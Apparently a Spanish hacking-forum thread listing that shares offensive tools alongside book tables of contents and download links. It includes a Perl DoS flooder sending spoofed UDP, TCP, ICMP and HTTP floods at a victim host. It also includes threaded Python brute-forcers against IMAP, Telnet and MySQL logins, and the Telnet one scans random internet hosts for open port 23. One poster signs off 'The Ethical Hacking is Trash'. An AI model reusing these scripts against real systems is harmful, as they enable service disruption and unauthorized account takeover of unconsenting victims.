"skype=00000&host=00000&login=00000&password=00000&pseudo=00000&about=00000&test=00000&home=00000&page=00000&pages=00000&info=00000&infos=00000&check=00000&verif=00000&port=00000&time=00000&temps=00000&key=00000&news=00000&submit=00000&msg=00000&message=00000&link=00000&url=00000&[email protected]&[email protected]&show=00000&id=00000\r\n";
















if( $proto eq 'UDP' )


                {
               


print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0




               
                    print color ("red"),"[+]",color("reset"),"Start Flooding .... ";
                    print color ("red"),"[+]",color("reset"),"\n";
                    for (;time() <= $endtime;) {
                                                    my $port_source = int(rand(65534)+1);
                                                    my $ip_source = join ".", map int rand 255, 1 .. 4;
                                                   
                                                    my $sport = int(rand(255));
                                                    $frag = int(rand(2));


                                                    my $packet = new Net::RawIP({
                                                            ip => {
                                                                    saddr => $ip_source,
                                                                    daddr => $victime,
                                                                    frag_off => $frag,
                                                                    },
                                                            udp => {
                                                                    source => $sport,
                                                                    dest => $port,
                                                                    data=> $size,
                                                                    }
                                                                                });


                                                    $packet->send;
     
     
                                                }
       
                }
   


   
 
if( $proto eq 'TCP' ) {
print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0


        print color ("red"),"[+]",color("reset"),"Start Flooding ....";
                    print color ("red"),"[+]",color("reset"),"\n";


    for (;time() <= $endtime;) {


        my( $pktct, $sport, $frag, $urg, $psh, $rst, $fin, $syn, $ack);
        my $port_source = int(rand(65534)+1);
        my $ip_source = join ".", map int rand 255, 1 .. 4;
       


   
        $frag = int(rand(2));
        $urg = int(rand(2));
        $psh = int(rand(2));
        $rst = int(rand(2));
        $fin = int(rand(2));
        $syn = int(rand(2));
        $ack = int(rand(2));
     


        my $packet = new Net::RawIP({
            ip => {
                saddr => $ip_source,
                daddr => $victime,
                frag_off => $frag,
                  },
            tcp => {
                source => $port_source,
                dest => $port,
                urg => $urg,
                psh => $psh,
                rst => $rst,
                fin => $fin,
                syn => $syn,
                ack => $ack,
                data => $size,
                    }
                                    });


        $packet->send;
     
     
                                    }
       
                                }
   
   
   
   
    if( $proto eq 'ICMP' ) {
   
    print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0
    print color ("red"),"[+]",color("reset"),"Start Flooding ....";
                    print color ("red"),"[+]",color("reset"),"\n";
for (;time() <= $endtime;) {


    my($pktct, $code, $type, $frag);
         my $port_source = int(rand(65534)+1);
     my $ip_source = join ".", map int rand 255, 1 .. 4;
   




     $code = int(rand(255));
      $type = int(rand(255));
      $frag = int(rand(2));
     


       my $packet = new Net::RawIP({
         ip => {
            saddr =>$ip_source,
            daddr => $victime,
            frag_off => $frag,
         },
         icmp => {
            code => $code,
            type => $type,
         }
      });


      $packet->send;
     
     
       }
       
   }
   
   
   
   
    if( $proto eq 'HTTP' ) {
    print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0
    print color ("red"),"[+]",color("reset"),"Start Flooding ....";
                    print color ("red"),"[+]",color("reset"),"\n";


for (;time() <= $endtime;) {
       
       
       


$sock = IO::Socket::INET->new(PeerAddr => $victime, PeerPort => 80, Proto => "tcp") or next;
print $sock $reqq;
print $sock $foke;
close($sock);
       }
       
   }
#23

Código: text
CHAPTER 1 Introduction to command shell scripting ................. 1
On Shell Scripting .........................................................................1
What is a shell? ........................................................................2
What is a script? .......................................................................3
Shell scripts...............................................................................3
Where shell scripting is useful .................................................4
UNIX, Linux, and OS X shell scripting .......................................5
Shell availability and choices...................................................5
Working with shells ..................................................................7
Bash basics ....................................................................................8
Hello World ..............................................................................8
Variables..................................................................................10
Arguments...............................................................................10
Control statements ..................................................................11
Putting it all together with bash..................................................15
Adding /dev/tcp/ support to bash ...........................................15
Building a port scanner with bash..........................................16
Improving the script ...............................................................18
Windows scripting .......................................................................18
Shell availability and choices.................................................18
Command.com and CMD.exe ................................................18
PowerShell ..............................................................................19
Cygwin....................................................................................20
Other shells .............................................................................21
PowerShell basics ........................................................................21
Hello World ...........................................................................22
Variables..................................................................................23
Arguments...............................................................................25
Control statements ..................................................................26
Conditionals ............................................................................27
Looping...................................................................................28
Putting it all together with PowerShell.......................................29
Building a port scanner with PowerShell ..............................30
Improving the script ...............................................................32
Summary......................................................................................32
Endnotes ......................................................................................33
v
CHAPTER 2 Introduction to Python ..........................................35
What is Python? ..........................................................................35
Where do we get Python? ......................................................36
Where is Python useful? .............................................................36
Multiplatform scripting...........................................................36
Network scripting ...................................................................36
Extensive modules ..................................................................37
Reusable code that is easy to create ......................................37
Python basics ...............................................................................38
Getting started.........................................................................38
Variables..................................................................................39
Modules...................................................................................40
Arguments...............................................................................41
Lists.........................................................................................44
Dictionaries .............................................................................46
Control statements ..................................................................51
Functions.................................................................................52
File manipulation.........................................................................54
Exception handling .................................................................55
Network communications............................................................57
Client communications ...........................................................57
Server communications ..........................................................59
Scapy.......................................................................................62
Summary......................................................................................68
Endnotes ......................................................................................68
CHAPTER 3 Introduction to Perl ..............................................69
Where Perl is useful ....................................................................69
Handling text ..........................................................................70
Gluing applications together ..................................................70
Working with Perl .......................................................................71
Editing tools............................................................................71
Extending Perl scripts.............................................................72
GUIs in Perl ............................................................................73
Perl basics....................................................................................73
Hello World ............................................................................73
Variables..................................................................................75
Shell commands......................................................................76
Arguments...............................................................................79
Control statements ..................................................................79
Regular expressions ................................................................85
File input and output ..............................................................87
Putting it all together...................................................................91
vi Contents
Building an SNMP scanner with Perl ....................................91
Improving the script ...............................................................97
Summary......................................................................................97
Endnotes ......................................................................................98
CHAPTER 4 Introduction to Ruby.............................................99
Where Ruby is useful..................................................................99
Ruby basics................................................................................100
Variables................................................................................102
Arrays and hashes.................................................................103
Control statements ................................................................106
Functions...............................................................................109
Building classes with Ruby.......................................................112
Building a class ....................................................................112
Extending a class ..................................................................114
Accessing class data .............................................................115
File manipulation.......................................................................117
Database basics..........................................................................118
Using DBI.............................................................................119
Using Active Record ............................................................121
Network operations ...................................................................124
Client communications .........................................................124
Server communications ........................................................126
Putting it all together.................................................................129
Summary....................................................................................134
Endnotes ....................................................................................135
CHAPTER 5 Introduction to Web scripting with PHP ............... 137
Where Web scripting is useful ..................................................137
Getting started with PHP...........................................................138
Scope.....................................................................................138
PHP basics ............................................................................138
Functions...............................................................................145
Handling forms with PHP.........................................................147
File handling and command execution .....................................150
File handling .........................................................................150
Command execution .............................................................154
Putting it all together.................................................................156
Summary....................................................................................159
CHAPTER 6 Manipulating Windows with PowerShell .............. 161
Dealing with execution policies in PowerShell ........................161
Contents vii
Execution policies.................................................................161
Bypassing the policies ..........................................................162
Getting in ..............................................................................165
Penetration testing uses for PowerShell....................................166
Controlling processes and services ......................................166
Interfacing with the event logs.............................................168
Getting and sending files over the network .........................169
Interfacing with the Registry................................................171
PowerShell and Metasploit........................................................176
PowerShell-oriented Metasploit modules ............................177
PowerDump ..........................................................................177
Windows gather PowerShell environment setting
enumeration ..........................................................................178
Making use of the modules ..................................................178
Summary....................................................................................179
Endnotes ....................................................................................180
CHAPTER 7 Scanner scripting............................................... 181
Working with scanning tools.....................................................181
Netcat ....................................................................................181
Nmap.....................................................................................182
Nessus/OpenVAS..................................................................182
Netcat.........................................................................................183
Implementations of Netcat ...................................................183
Simple Netcat usage .............................................................184
Building a Web server with Netcat ......................................185
Transferring files with Netcat...............................................187
Nmap..........................................................................................191
Working with service probes in Nmap ................................191
The Nmap scripting engine ..................................................194
Building Nmap NSE files.....................................................194
Nessus/OpenVAS.......................................................................196
NASL in Nessus and OpenVAS...........................................196
Nessus attack scripting language (NASL) ...........................196
Summary....................................................................................199
Endnotes ....................................................................................200
CHAPTER 8 Information gathering ......................................... 201
Information gathering for penetration testing...........................201
Sources of information .........................................................202
Patterns in information .........................................................202
Metadata................................................................................203
viii Contents
What can we do with the information?................................204
Talking to Google......................................................................205
Google hacking.....................................................................205
Advanced operators ..............................................................206
Automating Google discovery..............................................207
Web automation with Perl.........................................................209
Pulling information from Web sites .....................................209
Working with metadata .............................................................212
Finding metadata ..................................................................212
Document metadata ..............................................................214
Metadata in media files ........................................................214
Putting it all together.................................................................219
Summary....................................................................................221
Endnotes ....................................................................................221
CHAPTER 9 Exploitation scripting ......................................... 223
Building exploits with Python...................................................223
Getting software ...................................................................223
Setting up debugging............................................................224
Causing our first crash..........................................................225
Using pattern_offset..............................................................228
Controlling EIP.....................................................................230
Adding shellcode ..................................................................232
Getting our shell ...................................................................236
Creating Metasploit Exploits.....................................................237
Starting a template................................................................237
Porting the exploit code........................................................239
Executing the exploit............................................................240
Exploiting PHP scripts ..............................................................242
Remote File Inclusion ..........................................................242
Command execution vulnerabilities .....................................246
Cross-Site Scripting...................................................................248
What is XSS?........................................................................248
Exploiting XSS.....................................................................249
Summary....................................................................................253
CHAPTER 10 Post-exploitation scripting .................................. 255
Why post-exploitation is important ..........................................255
Windows shell commands.........................................................255
User management .................................................................256
Gathering network information.................................................259
Windows network information gathering ............................260
Contents ix
Linux network information gathering..................................261
Scripting Metasploit Meterpreter ..............................................262
Getting a shell ......................................................................262
Building a basic script..........................................................264
Executing the script..............................................................269
Database post-exploitation ........................................................270
What is SQL injection?........................................................270
MySQL .................................................................................271
SQL injection on Microsoft SQL Server.............................278
Summary....................................................................................280


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#24
Python / Python - Imap Brute Src
Julio 22, 2017, 03:24:40 AM

Código: python
#!usr/bin/python
#IMAP Brute Forcer


import threading, time, random, sys, imaplib, socket
from imaplib import IMAP4
from copy import copy


if len(sys.argv) !=4:
print "Usage: ./imapbrute.py <server> <userlist> <wordlist>"
sys.exit(1)


try:
  users = open(sys.argv[2], "r").readlines()
except(IOError):
  print "Error: Check your userlist path\n"
  sys.exit(1)
 
try:
  words = open(sys.argv[3], "r").readlines()
except(IOError):
  print "Error: Check your wordlist path\n"
  sys.exit(1)


print "\n\t  imapBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"


wordlist = copy(words)


def reloader():
for word in wordlist:
words.append(word)


def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words,  1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words,  1)
users.remove(users[0])

lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
M = imaplib.IMAP4(sys.argv[1])
M = login(user, value)
print "\t\nLogin successful:",user, value
M.close()
M.logout()
work.join()
sys.exit(2)
except(IMAP4.error, socket.gaierror, socket.error, socket.herror), msg:
print "An error occurred:", msg
pass

for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)

The Ethical Hacking is Trash

Editar / Borrar Editar Mensaje    Respuesta rápida a este mensaje Responder    Citar Citar    Multi-Citar Este Mensaje  Blog this Post         
#25
Python / Telnet Brute Src
Julio 21, 2017, 03:34:12 PM

Código: python
#!usr/bin/python
#Uses nmap to check if telnet port is open, brute forces if it is.


import threading, time, StringIO, commands, random, sys, telnetlib, re
from copy import copy


if len(sys.argv) !=4:
print "Usage: ./telnetbrute.py <how many to scan> <userlist> <wordlist>"
sys.exit(1)


try:
  users = open(sys.argv[2], "r").readlines()
except(IOError):
  print "Error: Check your userlist path\n"
  sys.exit(1)
 
try:
  words = open(sys.argv[3], "r").readlines()
except(IOError):
  print "Error: Check your wordlist path\n"
  sys.exit(1)


print "\n\t   d3hydr8[at]gmail[dot]com telnetBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"


wordlist = copy(words)


def scan():

nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -iR 1 -p 23 | grep open -B 3')[1]).readlines()

for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:   
return ipaddr


def reloader():
for word in wordlist:
words.append(word)


def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words,  1)
words.remove(value[0])

else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words,  1)

lock.release()
return value[0][:-1]

class Workhorse(threading.Thread):

def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
tn = telnetlib.Telnet(ipaddr[0])
tn.read_until("login: ")
tn.write(user[:-1] + "\n")
if password:
tn.read_until("Password: ")
tn.write(value + "\n")
tn.write("ls\n")
tn.write("exit\n")
print tn.read_all()
print "\t\nLogin successful:",user[:-1], value
tn.close()
work.join()
sys.exit(2)
except:
pass


for x in range(int(sys.argv[1])):
print "Scanning:",x,"of",sys.argv[1]
ipaddr = scan()
if ipaddr != None:
print "\n\tAttempting BruteForce:",ipaddr[0],"\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(2)
#26

Código: text
Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
xix
1. Installation
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
2. Introducing MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
53
3.  Introducing  PHP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
73
4. Publishing MySQL Data on the Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
115
5. Relational Database Design
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
151
6. Structured PHP Programming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
171
7. A Content Management System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
197
8. Content Formatting with Regular Expressions . . . . . . . . . . . . . . . . . . . . . .
241
9. Cookies, Sessions, and Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
261
10.  MySQL  Administration
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
313
11.  Advanced  SQL  Queries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
337
12.  Binary  Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
357
A. MySQL Syntax Reference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
389
B.  MySQL  Functions
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
415
C. MySQL Column Types
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
435
D. PHP Functions for Working with MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . .
449
Index
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
463


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#27
C# - VB.NET / FxTool Src
Julio 21, 2017, 09:17:02 AM


Enlace de descarga:
Código: text
https://jumpshare.com/v/TXEqHRkwB9Epyv9wnpns

#28


Enlace de descarga:
Código: text
https://jumpshare.com/v/D19Dw6HIWsFxBOQ3i8Kk
#29
Python / Mysqlbrute Src
Julio 20, 2017, 09:41:39 AM

Código: text
#!usr/bin/python
#MySQL Brute Forcer
#You need the MySQLdb package found here:
#http://sourceforge.net/projects/mysql-python

import threading, time, random, sys
from copy import copy

try:
    import MySQLdb
except(ImportError):
    print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n"
    sys.exit(1)

if len(sys.argv) !=6:
    print "Usage: ./mysqlbrute.py <server> <port> <database> <userlist> <wordlist>"
    sys.exit(1)

try:
      users = open(sys.argv[4], "r").readlines()
except(IOError):
      print "Error: Check your userlist path\n"
      sys.exit(1)
 
try:
      words = open(sys.argv[5], "r").readlines()
except(IOError):
      print "Error: Check your wordlist path\n"
      sys.exit(1)

print "\n\t   d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Port:",sys.argv[2]
print "[+] Database:",sys.argv[3]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"

wordlist = copy(words)

def reloader():
    for word in wordlist:
        words.append(word)

def getword():
    lock = threading.Lock()
    lock.acquire()
    if len(words) != 0:
        value = random.sample(words,  1)
        words.remove(value[0])       
    else:
        print "\nReloading Wordlist - Changing User\n"
        reloader()
        value = random.sample(words,  1)
        users.remove(users[0])
       
    lock.release()
    if len(users) ==1:
        return value[0][:-1], users[0]
    else:
        return value[0][:-1], users[0][:-1]
       
class Worker(threading.Thread):
   
    def run(self):
        value, user = getword()
        try:
            print "-"*12
            print "User:",user,"Password:",value
            db=MySQLdb.connect(host=sys.argv[1],user=user,passwd=value,db=sys.argv[3],port=int(sys.argv[2]))
            print "\t\nLogin successful:",value, user
            db.close()
            work.join()
            sys.exit(2)
        except(MySQLdb.Error), msg:
            #print "An error occurred:", msg
            pass

for i in range(len(words)*len(users)):
    work = Worker()
    work.start()
    time.sleep(1)
#30
Python / CS-Facebook-Multi-Group-Poster
Julio 20, 2017, 09:24:14 AM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#31

Código: text
PART 1 PREPARING FOR TRAINING . ...............................1
1 Enter the ninja 3
1.1 The JavaScript libraries we'll be tapping 4
1.2 Understanding the JavaScript language 5
1.3 Cross-browser considerations 6
1.4 Current best practices 9
Current best practice: testing 9 ■ Current best practice:
performance analysis 10
1.5 Summary 11
2 Arming with testing and debugging 13
2.1 Debugging code 14
Logging 14 ■ Breakpoints 16
vi CONTENTS
2.2 Test generation 17
2.3 Testing frameworks 19
QUnit 21 ■ YUI Test 22 ■ JsUnit 22
Newer unit-testing frameworks 22
2.4 The fundamentals of a test suite 22
The assertion 23 ■ Test groups 24 ■ Asynchronous testing 25
2.5 Summary 27
PART 2 APPRENTICE TRAINING.....................................29
3 Functions are fundamental 31
3.1 What's with the functional difference? 32
Why is JavaScript's functional nature important? 33
Sorting with a comparator 37
3.2 Declarations 40
Scoping and functions 43
3.3 Invocations 46
From arguments to function parameters 47 ■ Invocation as
a function 49 ■ Invocation as a method 50 ■ Invocation as
a constructor 52 ■ Invocation with the apply() and
call() methods 54
3.4 Summary 58
4 Wielding functions 61
4.1 Anonymous functions 62
4.2 Recursion 64
Recursion in named functions 64 ■ Recursion with methods 65
The pilfered reference problem 66 ■ Inline named functions 68
The callee property 70
4.3 Fun with function as objects 71
Storing functions 72 ■ Self-memoizing functions 73
Faking array methods 76
4.4 Variable-length argument lists 77
Using apply() to supply variable arguments 77
Function overloading 79
4.5 Checking for functions 86
4.6 Summary 88


CONTENTS vii
5 Closing in on closures 89
5.1 How closures work 90
5.2 Putting closures to work 94
Private variables 94 ■ Callbacks and timers 96
5.3 Binding function contexts 99
5.4 Partially applying functions 103
5.5 Overriding function behavior 106
Memoization 106 ■ Function wrapping 109
5.6 Immediate functions 111
Temporary scope and private variables 112 ■ Loops 115
Library wrapping 117
5.7 Summary 118
6 Object-orientation with prototypes 119
6.1 Instantiation and prototypes 120
Object instantiation 120 ■ Object typing via constructors 127
Inheritance and the prototype chain 128
HTML DOM prototypes 133
6.2 The gotchas! 135
Extending Object 135 ■ Extending Number 136
Subclassing native objects 137 ■ Instantiation issues 139
6.3 Writing class-like code 143
Checking for function serializability 146 ■ Initialization
of subclasses 147 ■ Preserving super-methods 148
6.4 Summary 150
7 Wrangling regular expressions 151
7.1 Why regular expressions rock 152
7.2 A regular expression refresher 153
Regular expressions explained 153 ■ Terms and operators 154
7.3 Compiling regular expressions 158
7.4 Capturing matching segments 161
Performing simple captures 161 ■ Matching using
global expressions 162 ■ Referencing captures 163
Non-capturing groups 165
7.5 Replacing using functions 166


viii CONTENTS
7.6 Solving common problems with regular expressions 168
Trimming a string 168 ■ Matching newlines 170
Unicode 171 ■ Escaped characters 172
7.7 Summary 172
8 Taming threads and timers 175
8.1 How timers and threading work 176
Setting and clearing timers 176 ■ Timer execution within
the execution thread 177 ■ Differences between timeouts
and intervals 179
8.2 Minimum timer delay and reliability 180
8.3 Dealing with computationally expensive processing 183
8.4 Central timer control 186
8.5 Asynchronous testing 189
8.6 Summary 190
PART 3 NINJA TRAINING ............................................191
9 Ninja alchemy: runtime code evaluation 193
9.1 Code evaluation mechanisms 194
Evaluation with the eval() method 194 ■ Evaluation via the
Function constructor 197 ■ Evaluation with timers 197
Evaluation in the global scope 198 ■ Safe code evaluation 199
9.2 Function "decompilation" 201
9.3 Code evaluation in action 204
Converting JSON 204 ■ Importing namespaced code 205
JavaScript compression and obfuscation 206 ■ Dynamic
code rewriting 208 ■ Aspect-oriented script tags 209
Metalanguages and DSLs 210
9.4 Summary 213
10 With statements 215
10.1 What's with "with"? 216
Referencing properties within a with scope 216 ■ Assignments
within a with scope 218 ■ Performance considerations 219
10.2 Real-world examples 221
10.3 Importing namespaced code 223


CONTENTS ix
10.4 Testing 223
10.5 Templating with "with" 224
10.6 Summary 227
11 Developing cross-browser strategies 229
11.1 Choosing which browsers to support 230
11.2 The five major development concerns 231
Browser bugs and differences 232 ■ Browser bug fixes 233
Living with external code and markup 234
Missing features 239 ■ Regressions 240
11.3 Implementation strategies 242
Safe cross-browser fixes 242 ■ Object detection 243
Feature simulation 245 ■ Untestable browser issues 247
11.4 Reducing assumptions 249
11.5 Summary 251
12 Cutting through attributes, properties, and CSS 253
12.1 DOM attributes and properties 255
Cross-browser naming 256 ■ Naming restrictions 257
Differences between XML and HTML 257 ■ Behavior of
custom attributes 258 ■ Performance considerations 258
12.2 Cross-browser attribute issues 262
DOM id/name expansion 262 ■ URL normalization 264
The style attribute 265 ■ The type attribute 265
The tab index problem 266 ■ Node names 267
12.3 Styling attribute headaches 267
Where are my styles? 268 ■ Style property naming 270
The float style property 271 ■ Conversion of pixel values 271
Measuring heights and widths 272 ■ Seeing through
opacity 276 ■ Riding the color wheel 279
12.4 Fetching computed styles 282
12.5 Summary 285
PART 4 MASTER TRAINING.........................................287
13 Surviving events 289
13.1 Binding and unbinding event handlers 290
13.2 The Event object 294


x CONTENTS
13.3 Handler management 297
Centrally storing associated information 298
Managing event handlers 300
13.4 Triggering events 309
Custom events 310
13.5 Bubbling and delegation 315
Delegating events to an ancestor 315 ■ Working around
browser deficiencies 316
13.6 The document ready event 324
13.7 Summary 326
14 Manipulating the DOM 329
14.1 Injecting HTML into the DOM 330
Converting HTML to DOM 331 ■ Inserting into
the document 334 ■ Script execution 336
14.2 Cloning elements 338
14.3 Removing elements 340
14.4 Text contents 341
Setting text 342 ■ Getting text 343
14.5 Summary 344
15 CSS selector engines 345
15.1 The W3C Selectors API 347
15.2 Using XPath to find elements 349
15.3 The pure-DOM implementation 351
Parsing the selector 353 ■ Finding the elements 354
Filtering the set 355 ■ Recursing and merging 356
Bottom-up selector engine 357
15.4 Summary 359



Enlace de descarga:
Código: text
https://jumpshare.com/v/rJXhwuiOvGtquVj6sOGw
#32
Python / File-Sorter
Julio 19, 2017, 08:04:55 PM
ordena los archivos de acuerdo con sus extensiones como .exe se ponen en la carpeta Exectuables y el archivo .py se ponen en archivos Python.
Las extensiones y los nombres de las carpetas están codificados, se pueden agregar más extensiones según las necesidades del usuario.

Antes:


Despues:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#33

Código: text
 1 The Forensics Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5Types of Investigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
The Role of the Investigator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Elements of a Good Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Cross-validation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Proper Evidence Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Completeness of Investigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Management of Archives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Technical Competency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Explicit Defi nition and Justifi cation for the Process . . . . . . . . . . . . . . 14
Legal Compliance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Flexibility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Defi ning a Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Identifi cation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
00-FM.indd xi 8/23/2009 3:54:44 AM


xii Hacking Exposed Computer Forensics
Collection and Preservation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Production and Presentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
After the Investigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
▼ 2 Computer Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
The Bottom-up View of a Computer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
It's All Just 1s and 0s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Learning from the Past: Giving Computers Memory . . . . . . . . . . . . . 22
Basic Input and Output System (BIOS) . . . . . . . . . . . . . . . . . . . . . . . . . 24
The Operating System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
The Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Types of Media . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Magnetic Media . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Optical Media . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Memory Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
▼ 3 Forensic Lab Environment Preparation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
The Ultimate Computer Forensic Lab . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
What Is a Computer Forensic Laboratory? . . . . . . . . . . . . . . . . . . . . . . 42
Forensic Lab Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Protecting the Forensic Lab . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Forensic Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Components of a Forensic Host . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Commercially Available Hardware Systems . . . . . . . . . . . . . . . . . . . . 51
Do-It-Yourself Hardware Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
Data Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
Forensic Hardware and Software Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
Using Hardware Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
Using Software Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
The Flyaway Kit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
Case Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
Bonus: Linux or Windows? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
Part II Collecting the Evidence
Case Study: The Collections Agency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Preparations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Revelations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Collecting Evidence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
▼ 4 Forensically Sound Evidence Collection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Collecting Evidence from a Single System . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
Step 1: Power Down the Suspect System . . . . . . . . . . . . . . . . . . . . . . . 65
00-FM.indd xii 8/23/2009 3:54:44 AM


Contents xiii
Step 2: Remove the Drive(s) from the Suspect System . . . . . . . . . . . . 65
Step 3: Check for Other Media . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Step 4: Record BIOS Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Step 5: Forensically Image the Drive . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Step 6: Record Cryptographic Hashes . . . . . . . . . . . . . . . . . . . . . . . . . . 92
Step 7: Bag and Tag . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Move Forward . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Common Mistakes in Evidence Collection . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
